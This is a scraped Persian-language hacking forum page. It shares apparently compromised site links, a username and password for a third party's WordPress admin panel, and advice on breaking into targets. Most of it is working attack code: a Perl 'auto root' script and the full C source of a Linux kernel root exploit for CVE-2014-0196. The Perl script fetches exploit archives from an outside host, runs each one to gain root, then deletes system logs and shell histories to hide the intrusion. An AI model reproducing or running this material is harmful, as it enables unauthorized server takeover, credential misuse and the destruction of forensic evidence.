Best512

http://www.budbuyer.com/0.php

User & Pw : iran-cyber http://www.timik.net/wp-admin/

تقریبا میشه گفت PriV8 Link Download

این یک اکسپلویت هست تحته متاسپلویته http://www.exploit-db.com/exploits/36421/ و این هم یک اسکریپت به زبان perl هست که شما کد رو ذخیره میکنی با فرمت pl و در کالی لینوکس یا در ویندوز با نصب اکتیو پرل به شکل زیر ران میکنید [email protected]:~/Desktop# name.pl ip target موفق باشید

میشه بیشتر توضیح بدی یا یه لینک اموزش بهم بدی تا بتونم با این باگ ها نفوز کنم پیشنهاد من به شما اینه که از همون CSRF استفاده کنید حالا یکمی سرچ کنید راجب buffer overflow به نتیجه ای میرسید http://www.exploit-db.com/exploits/36421/ http://www.exploit-db.com/exploits/19937/

دوست عزیز شما میتونید از اسیب پذیریه buffer overflow استفاده کنید بعد روش های زیادی برای نفوذ زدن به تارگت از طریق csrf هست Remote Buffer Overflow Exploit http://www.exploit-db.com/exploits/19937/

Bypass Not Acceptable Dl Link

اموزش پیدا کردن PhpMyAdmin با استفاده از websploit توی بخش تاپیک جامع آموزش های مرتبط با Back Track و Kali Linux موجود هست

Bypass Nobody Dl Link

در آموزش اول یاد میگیریم Mod Security رو بایــپس کنیم که این عمل باعث میشه بین دایرکتوری هامون جا به جا شیم همه چــیز در فیــلم واضــحــه لـــینک دانــلــود

با سلام در این بخش آموزش های مربوط به LinUx Server Bypassing قـرار میگیره ســوالــی بود پ.خ با تشکر

Log Cleaner Ham Tosh Hast #!/usr/bin/perl #Author MR.Best #Name Iran Cyber Auto Root 2008-2014 #home http://iran-cyber.org #Mail [email protected] print "|====================================================|\n"; print "| | Autoroot | |\n"; print "| | By MR.Best | |\n"; print "|======================[ Use ]=======================|\n"; print "| Auto Root Linux Servers 2008-2014 |\n"; print "|====================================================|\n"; print "| Y!D : [email protected] |\n"; print "| Home : wWw.Iran-Cyber.org |\n"; print "|====================[ Autoroot ]====================|\n"; $^O eq "MSWin32" ? system("cls&color 0a") : system("clear"); print"..."; system("uname -a"); system("id"); system("whoami"); print "Gathering Exploit "; system("mkdir Lrks"); system("cd Leks"); system("wget http://lrkbest.vvs.ir/2008.tar.gz"); system("tar -xzf 2008.tar.gz"); system("mkdir l2008"); system("cp 2008 l2008"); system("cd l2008"); system("chmod 777 2.6.9"); system("chmod 777 2.6.18"); system("chmod 777 2.6.23=2008"); system("chmod 777 2.6.27.7.c"); system("./2.6.9;"); system("id;whoami"); system("./2.6.18"); system("id;whoami"); system("./2.6.23=2008"); system("id;whoami"); system("./2.6.27.7.c"); system("id"); system("whoami"); sleep(2); system("wget http://lrkbest.vvs.ir/2009.tar.gz"); system("tar -xzf 2009.tar.gz"); system("mkdir l2009"); system("cp 2009 l2009"); system("cd l2009"); system("chmod 777 200.6.24"); system("chmod 777 2009.6.18-164"); system("chmod 777 2009.6.31_2009"); system("chmod 777 2009.6.31_2009_2"); system("chmod 777 2009.6.31_2009_3"); system("chmod 777 dene"); system("chmod 777 keris"); system("chmod 777 ror"); system("./200.6.24"); system("id;whoami"); system("./2009.6.18-164"); system("id;whoami"); system("./2009.6.31_2009"); system("id;whoami"); system("./2009.6.31_2009_2"); system("id;whoami"); system("./2009.6.31_2009_3"); system("id;whoami"); system("./dene"); system("id;whoami"); system("./keris"); system("id;whoami"); system("./ror"); system("id"); system("whoami"); sleep(2); system("wget http://lrkbest.vvs.ir/2010.tar.gz"); system("mkdir l2010"); system("tar -xzf 2010.tar.gz"); system("cp 2010 l2010"); system("cd l2010"); system("chmod 777 2"); system("chmod 777 2.6.18"); system("chmod 777 2.6.18--2010"); system("chmod 777 2.9.18-164"); system("chmod 777 2.6.18-2010"); system("chmod 777 2.6.3r00t.c"); system("chmod 777 2.6.32.c"); system("chmod 777 2-6.c"); system("chmod 777 3"); system("chmod 777 6"); system("chmod 777 2010"); system("chmod 777 2010-1"); system("chmod 777 c"); system("chmod 777 DataCoders"); system("chmod 777 ia32syscall"); system("chmod 777 kalakhan.c"); system("chmod 777 local2627"); system("chmod 777 robert_you_suck.c"); system("chmod 777 sec.c"); system("chmod 777 priv8-2.6.18-164-2010"); system("chmod 777 shbd"); system("./2"); system("id;whoami"); system("./2.6.18;id"); system("id;whoami"); system("./2.6.18--2010"); system("id;whoami"); system("./2.9.18-164"); system("id;whoami"); system("./2.6.18-2010"); system("id;whoami"); system("./2.6.3r00t.c"); system("id;whoami"); system("./2.6.32.c"); system("id;whoami"); system("./2-6.c"); system("id;whoami"); system("./3"); system("id;whoami"); system("./6"); system("id;whoami"); system("./2010"); system("id;whoami"); system("./2010-1"); system("id;whoami"); system("./c"); system("id;whoami"); system("./DataCoders"); system("id;whoami"); system("./ia32syscall"); system("id;whoami"); system("./kalakhan.c"); system("id;whoami"); system("./local2627"); system("id;whoami"); system("./robert_you_suck.c"); system("id;whoami"); system("./sec.c"); system("id;whoami"); system("./priv8-2.6.18-164-2010"); system("id;whoami"); system("./shbd"); system("id;whoami"); system("id"); system("whoami"); sleep(2); system("wget http://lrkbest.vvs.ir/2011.tar.gz"); system("mkdir l2011"); system("cp 2011 l2011"); system("cd l2011"); system("chmod 777 2.6.18.308.sh"); system("chmod 777 2.6.18.c"); system("chmod 777 2.6.18_2011.c"); system("chmod 777 2.6.18-6-x86-2011"); system("chmod 777 2.6.18-274-2011"); system("chmod 777 2.6.18-2012.c"); system("chmod 777 2.6.32.9-rscloud-2010.c"); system("chmod 777 2.6.32-2013.c"); system("chmod 777 2.6.33.c"); system("chmod 777 2.6.34.c"); system("chmod 777 2.6.34-2011"); system("chmod 777 2.6.34-2011.c"); system("chmod 777 2.6.34-2011-2.c"); system("chmod 777 2.6.37.c"); system("chmod 777 2.6.37-rc2.c"); system("chmod 777 2.6.43.2.c"); system("chmod 777 2-6-32-46-2011"); system("chmod 777 3.0.c"); system("chmod 777 local2.6.18_2011.c"); system("./2.6.18.308.sh"); system("id;whoami"); system("./2.6.18.c"); system("id;whoami"); system("./2.6.18_2011.c"); system("id;whoami"); system("./2.6.18-6-x86-2011"); system("id;whoami"); system("./2.6.18-274-2011"); system("id;whoami"); system("./2.6.18-2012.c"); system("id;whoami"); system("./2.6.32.9-rscloud-2010.c"); system("id;whoami"); system("./2.6.32-2013.c"); system("id;whoami"); system("./2.6.33.c"); system("id;whoami"); system("./2.6.34.c"); system("id;whoami"); system("./2.6.34-2011"); system("id;whoami"); system("./2.6.34-2011.c"); system("id;whoami"); system("./2.6.34-2011-2.c"); system("id;whoami"); system("./2.6.37.c"); system("id;whoami"); system("./2.6.37-rc2.c"); system("id;whoami"); system("./2.6.43.2.c"); system("id;whoami"); system("./2-6-32-46-2011"); system("id;whoami"); system("./3.0.c"); system("id;whoami"); system("./local2.6.18_2011.c"); system("id"); system("whoami"); sleep(2); system("wget http://lrkbest.vvs.ir/2012.tar.gz"); system("mkdir l2012"); system("tar -xzf 2012.tar.gz"); system("cp 2011 l2011"); system("cd l2012"); system("chmod 777 2.6.18 2012.c"); system("chmod 777 2.6.18.2012"); system("chmod 777 2.6.18.2012.c"); system("chmod 777 2.6.37-3+-2013.c"); system("chmod 777 3.6,3.8.9-2013.c"); system("chmod 777 2012-2.6.39"); system("chmod 777 2012root.c"); system("chmod 777 2012-root.c"); system("chmod 777 a2.out"); system("chmod 777 kingofcontrol2012"); system("chmod 777 sec.out"); system("./2.6.18 2012.c"); system("id;whoami"); system("./2.6.18.2012"); system("id;whoami"); system("./2.6.18.2012.c"); system("id;whoami"); system("./2.6.37-3+-2013.c"); system("id;whoami"); system("./3.6,3.8.9-2013.c"); system("id;whoami"); system("./2012-2.6.39"); system("id;whoami"); system("./2012root.c"); system("id;whoami"); system("./2012-root.c"); system("id;whoami"); system("./a2.out"); system("id;whoami"); system("./kingofcontrol2012"); system("id;whoami"); system("./sec.out"); system("id"); system("whoami"); sleep(2); system("wget http://lrkbest.vvs.ir/2013.tar.gz"); system("mkdir l2013"); system("tar -xzf 2013.tar.gz"); system("cp 2013 l2013"); system("cd l2013"); system("chmod 777 2.6.17.4_2013"); system("chmod 777 2.6.32[2013].c"); system("chmod 777 2.6.32-2013"); system("chmod 777 rezk2ll"); system("chmod 777 root-2013.2.6.32.c"); system("chmod 777 sec.out"); system("./2.6.17.4_2013"); system("id;whoami"); system("./2.6.32[2013].c"); system("id;whoami"); system("./2.6.32-2013"); system("id;whoami"); system("./sec.out"); system("id;whoami"); system("./rezk2ll"); system("id;whoami"); system("./root-2013.2.6.32.c"); system("id"); system("whoami"); sleep(2); system("wget http://lrkbest.vvs.ir/2014.zip"); system("mkdir l2014"); system("unzip 2014.zip"); system("cp 2014 l2014"); system("cd l2014"); system("chmod 777 3.15"); system("chmod 777 3.14.c") system("./3.15"); system("./3.14.c") system("id"); system("whoami"); sleep(5); print "..."; print "#====================================================|\n"; print " Jop Finish"; print " Cleaning Log Started"; print "|====================================================|\n"; print "..."; system("rm -rf /tmp/logs"); system("rm -rf /root/.ksh_history"); system("rm -rf /root/.bash_history"); system("rm -rf /root/.bash_logout"); system("rm -rf /usr/local/apache/logs"); system("rm -rf /usr/local/apache/log"); system("rm -rf /var/apache/logs"); system("rm -rf /var/apache/log"); system("rm -rf /var/run/utmp"); system("rm -rf /var/logs"); system("rm -rf /var/log"); system("rm -rf /var/adm"); system("rm -rf /etc/wtmp"); system("rm -rf /etc/utmp"); print "..."; print "#====================================================|\n"; print "The Logs Has Been Cleaned"; print " Good Lock ;-)"; print "|====================================================|\n"; system("exit")

/* * CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race * condition * * Slightly-less-than-POC privilege escalation exploit * For kernels >= v3.14-rc1 * * Matthew Daley <[email protected]> * * Usage: * $ gcc cve-2014-0196-md.c -lutil -lpthread * $ ./a.out * [+] Resolving symbols * [+] Resolved commit_creds: 0xffffffff81056694 * [+] Resolved prepare_kernel_cred: 0xffffffff810568a7 * [+] Doing once-off allocations * [+] Attempting to overflow into a tty_struct............... * [+] Got it * # id * uid=0(root) gid=0(root) groups=0(root) * * WARNING: The overflow placement is still less-than-ideal; there is a 1/4 * chance that the overflow will go off the end of a slab. This does not * necessarily lead to an immediate kernel crash, but you should be prepared * for the worst (i.e. kernel oopsing in a bad state). In theory this would be * avoidable by reading /proc/slabinfo on systems where it is still available * to unprivileged users. * * Caveat: The vulnerability should be exploitable all the way from * v2.6.31-rc3, however relevant changes to the TTY subsystem were made in * commit acc0f67f307f52f7aec1cffdc40a786c15dd21d9 ("tty: Halve flip buffer * GFP_ATOMIC memory consumption") that make exploitation simpler, which this * exploit relies on. * * Thanks to Jon Oberheide for his help on exploitation technique. */ #include <sys/stat.h> #include <sys/types.h> #include <fcntl.h> #include <pthread.h> #include <pty.h> #include <stdio.h> #include <string.h> #include <termios.h> #include <unistd.h> #define TTY_MAGIC 0x5401 #define ONEOFF_ALLOCS 200 #define RUN_ALLOCS 30 struct device; struct tty_driver; struct tty_operations; typedef struct { int counter; } atomic_t; struct kref { atomic_t refcount; }; struct tty_struct_header { int magic; struct kref kref; struct device *dev; struct tty_driver *driver; const struct tty_operations *ops; } overwrite; typedef int __attribute__((regparm(3))) (* commit_creds_fn)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* prepare_kernel_cred_fn)(unsigned long cred); int master_fd, slave_fd; char buf[1024] = {0}; commit_creds_fn commit_creds; prepare_kernel_cred_fn prepare_kernel_cred; int payload(void) { commit_creds(prepare_kernel_cred(0)); return 0; } unsigned long get_symbol(char *target_name) { FILE *f; unsigned long addr; char dummy; char name[256]; int ret = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) return 0; while (ret != EOF) { ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, name); if (ret == 0) { fscanf(f, "%s\n", name); continue; } if (!strcmp(name, target_name)) { printf("[+] Resolved %s: %p\n", target_name, (void *)addr); fclose(f); return addr; } } printf("[-] Couldn't resolve \"%s\"\n", name); fclose(f); return 0; } void *overwrite_thread_fn(void *p) { write(slave_fd, buf, 511); write(slave_fd, buf, 1024 - 32 - (1 + 511 + 1)); write(slave_fd, &overwrite, sizeof(overwrite)); } int main() { char scratch[1024] = {0}; void *tty_operations[64]; int i, temp_fd_1, temp_fd_2; for (i = 0; i < 64; ++i) tty_operations[i] = payload; overwrite.magic = TTY_MAGIC; overwrite.kref.refcount.counter = 0x1337; overwrite.dev = (struct device *)scratch; overwrite.driver = (struct tty_driver *)scratch; overwrite.ops = (struct tty_operations *)tty_operations; puts("[+] Resolving symbols"); commit_creds = (commit_creds_fn)get_symbol("commit_creds"); prepare_kernel_cred = (prepare_kernel_cred_fn)get_symbol("prepare_kernel_cred"); if (!commit_creds || !prepare_kernel_cred) return 1; puts("[+] Doing once-off allocations"); for (i = 0; i < ONEOFF_ALLOCS; ++i) if (openpty(&temp_fd_1, &temp_fd_2, NULL, NULL, NULL) == -1) { puts("[-] pty creation failed"); return 1; } printf("[+] Attempting to overflow into a tty_struct..."); fflush(stdout); for (i = 0; ; ++i) { struct termios t; int fds[RUN_ALLOCS], fds2[RUN_ALLOCS], j; pthread_t overwrite_thread; if (!(i & 0xfff)) { putchar('.'); fflush(stdout); } if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) == -1) { puts("\n[-] pty creation failed"); return 1; } for (j = 0; j < RUN_ALLOCS; ++j) if (openpty(&fds[j], &fds2[j], NULL, NULL, NULL) == -1) { puts("\n[-] pty creation failed"); return 1; } close(fds[RUN_ALLOCS / 2]); close(fds2[RUN_ALLOCS / 2]); write(slave_fd, buf, 1); tcgetattr(master_fd, &t); t.c_oflag &= ~OPOST; t.c_lflag |= ECHO; tcsetattr(master_fd, TCSANOW, &t); if (pthread_create(&overwrite_thread, NULL, overwrite_thread_fn, NULL)) { puts("\n[-] Overwrite thread creation failed"); return 1; } write(master_fd, "A", 1); pthread_join(overwrite_thread, NULL); for (j = 0; j < RUN_ALLOCS; ++j) { if (j == RUN_ALLOCS / 2) continue; ioctl(fds[j], 0xdeadbeef); ioctl(fds2[j], 0xdeadbeef); close(fds[j]); close(fds2[j]); } ioctl(master_fd, 0xdeadbeef); ioctl(slave_fd, 0xdeadbeef); close(master_fd); close(slave_fd); if (!setresuid(0, 0, 0)) { setresgid(0, 0, 0); puts("\n[+] Got it "); execl("/bin/bash", "/bin/bash", NULL); } } }